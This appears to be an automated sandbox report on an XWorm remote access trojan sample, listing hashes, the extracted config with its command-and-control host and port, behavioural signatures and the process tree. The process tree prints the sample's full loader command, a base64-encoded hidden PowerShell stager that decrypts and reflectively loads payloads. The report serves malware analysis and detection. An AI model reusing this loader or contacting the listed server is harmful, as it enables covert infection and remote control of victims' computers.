xworm | 2a7ac0e5a3c13e07d3992907e86ec563a19f092fae7269b1eef0b8982ad66d5a

General

Target

windows.cmd
Size

41KB
MD5

7c1a0a81ca6698741b4e63474dd92aec
SHA1

b280133be4093e3b3e26f8d093b586c56b08c307
SHA256

2a7ac0e5a3c13e07d3992907e86ec563a19f092fae7269b1eef0b8982ad66d5a
SHA512

c34baf46f54d94784cb15ad47557143c379270a1d1fb9c1a0249afd6055e3416ac13315e9d53091f6f5a218572c22779989b6ebe5d572ee57876ceb22ef4f8d2
SSDEEP

768:7hVuKGJcDLbuIQS1Bi9LA51oYuBZnYHUCpZs2P/FA220SIv7FSBCtY7YleBQl:7T3LbfQKqq/s2P/+220SID4oSYlWQl

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

myday.duckdns.org:8895

Mutex

NMs5XoXNfsv6X5Qw

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/3660-35-0x0000027A7CD70000-0x0000027A7CD7E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
38	3660	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3660	powershell.exe
3660	powershell.exe
4128	powershell.exe
4128	powershell.exe
3660	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	4128	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3660	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4420 wrote to memory of 3172	4420	cmd.exe	88
PID 4420 wrote to memory of 3172	4420	cmd.exe	88
PID 4420 wrote to memory of 4872	4420	cmd.exe	90
PID 4420 wrote to memory of 4872	4420	cmd.exe	90
PID 4872 wrote to memory of 5060	4872	cmd.exe	92
PID 4872 wrote to memory of 5060	4872	cmd.exe	92
PID 4872 wrote to memory of 4616	4872	cmd.exe	93
PID 4872 wrote to memory of 4616	4872	cmd.exe	93
PID 4872 wrote to memory of 3660	4872	cmd.exe	94
PID 4872 wrote to memory of 3660	4872	cmd.exe	94
PID 3660 wrote to memory of 4128	3660	powershell.exe	98
PID 3660 wrote to memory of 4128	3660	powershell.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4420
- C:\Windows\system32\cmd.exe
  cmd /c "set __=^&rem"
  2⤵
  PID:3172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4872
- - C:\Windows\system32\cmd.exe
    cmd /c "set __=^&rem"
    3⤵
    PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gS0NMQUMoJFhwbHZMKXskTHl0QlI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEx5dEJSLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskTHl0QlIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRMeXRCUi5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnVEJSbUcxd28rdWF0QURqb3VteXpOQ2RPdHR2Mm9SVFByZ2VvRE1mOXQrOD0nKTskTHl0QlIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnRzJYODNZL2FpSmRPajBHVkh1K3gydz09Jyk7JHpyS29PPSRMeXRCUi5DcmVhdGVEZWNyeXB0b3IoKTskbEJ2SWU9JHpyS29PLlRyYW5zZm9ybUZpbmFsQmxvY2soJFhwbHZMLDAsJFhwbHZMLkxlbmd0aCk7JHpyS29PLkRpc3Bvc2UoKTskTHl0QlIuRGlzcG9zZSgpOyRsQnZJZTt9ZnVuY3Rpb24ga0tOV1goJFhwbHZMKXskcHBsdXI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkWHBsdkwpOyRKb2ZSSz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JEtSU2RMPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJHBwbHVyLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskS1JTZEwuQ29weVRvKCRKb2ZSSyk7JEtSU2RMLkRpc3Bvc2UoKTskcHBsdXIuRGlzcG9zZSgpOyRKb2ZSSy5EaXNwb3NlKCk7JEpvZlJLLlRvQXJyYXkoKTt9JG1MTmtiPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskZWJ6eVg9a0tOV1ggKEtDTEFDIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1MTmtiLCA1KS5TdWJzdHJpbmcoMikpKSk7JFRIeXlTPWtLTldYIChLQ0xBQyAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtTE5rYiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kVEh5eVMpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGVienlYKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
    3⤵
    PID:4616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3660
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4128

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jyxy0ggn.fno.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3660-31-0x0000027A64720000-0x0000027A6472A000-memory.dmp

Filesize
40KB

Download
memory/3660-39-0x0000027A64660000-0x0000027A64670000-memory.dmp

Filesize
64KB

Download
memory/3660-11-0x0000027A64660000-0x0000027A64670000-memory.dmp

Filesize
64KB

Download
memory/3660-12-0x0000027A64660000-0x0000027A64670000-memory.dmp

Filesize
64KB

Download
memory/3660-13-0x0000027A7D250000-0x0000027A7D294000-memory.dmp

Filesize
272KB

Download
memory/3660-14-0x0000027A7D320000-0x0000027A7D396000-memory.dmp

Filesize
472KB

Download
memory/3660-47-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-46-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-45-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-33-0x00007FFA8C660000-0x00007FFA8C71E000-memory.dmp

Filesize
760KB

Download
memory/3660-43-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-0-0x0000027A646E0000-0x0000027A64702000-memory.dmp

Filesize
136KB

Download
memory/3660-10-0x00007FFA6FC70000-0x00007FFA70731000-memory.dmp

Filesize
10.8MB

Download
memory/3660-44-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-38-0x0000027A64660000-0x0000027A64670000-memory.dmp

Filesize
64KB

Download
memory/3660-35-0x0000027A7CD70000-0x0000027A7CD7E000-memory.dmp

Filesize
56KB

Download
memory/3660-36-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/3660-37-0x00007FFA6FC70000-0x00007FFA70731000-memory.dmp

Filesize
10.8MB

Download
memory/3660-34-0x0000027A7CD60000-0x0000027A7CD6C000-memory.dmp

Filesize
48KB

Download
memory/3660-32-0x00007FFA8E4B0000-0x00007FFA8E6A5000-memory.dmp

Filesize
2.0MB

Download
memory/3660-41-0x0000027A7CDC0000-0x0000027A7CF0E000-memory.dmp

Filesize
1.3MB

Download
memory/4128-30-0x00007FFA6FC70000-0x00007FFA70731000-memory.dmp

Filesize
10.8MB

Download
memory/4128-29-0x000001527ACC0000-0x000001527AE0E000-memory.dmp

Filesize
1.3MB

Download
memory/4128-26-0x000001527AB60000-0x000001527AB70000-memory.dmp

Filesize
64KB

Download
memory/4128-25-0x000001527AB60000-0x000001527AB70000-memory.dmp

Filesize
64KB

Download
memory/4128-24-0x00007FFA6FC70000-0x00007FFA70731000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing